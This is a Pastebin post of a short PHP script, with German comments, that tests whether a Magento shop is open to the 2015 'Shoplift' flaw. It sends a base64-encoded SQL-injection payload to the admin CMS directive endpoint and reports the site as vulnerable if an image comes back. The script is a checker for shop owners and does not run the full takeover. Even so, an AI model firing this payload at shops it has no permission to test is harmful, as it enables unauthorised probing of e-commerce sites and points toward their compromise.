Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- Kurzes PHP-Skript was überprüft ob der Magento-Shop
- verwundbar ist durch die Shoplift-Attacke. #shoplift
- Copyright (C) 2015 Fabian Bitter (fabian.bitter@me.com)
- */
- function post($url, $post = false) {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- if ($post !== false) {
- foreach ($post as $key => $value) {
- $fields_string .= $key . '=' . $value . '&';
- }
- rtrim($fields_string, '&');
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_POST, count($fields));
- curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
- }
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- function check_if_magento_is_vulnerable($url) {
- $url_parts = parse_url($url);
- $data = post(
- sprintf(
- "%s://%s/admin/Cms_Wysiwyg/directive/index/",
- $url_parts["scheme"],
- $url_parts["host"]
- ),
- array(
- "filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);"),
- "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
- "forwarded" => "1"
- )
- );
- /*
- Wenn der Shop verwundbar ist wird an der Stelle eine PNG-Datei wiedergegeben,
- statt der Login-Seite.
- */
- return (@imagecreatefromstring($data) !== false);
- }
- $your_shop_url = "http://www.deine-shop-adresse.de";
- if (check_if_magento_is_vulnerable($your_shop_url)) {
- print "Die Seite ist verwundbar.\n";
- } else {
- print "Die Seite ist nicht verwundbar.\n";
- }
Add Comment
Please, Sign In to add comment
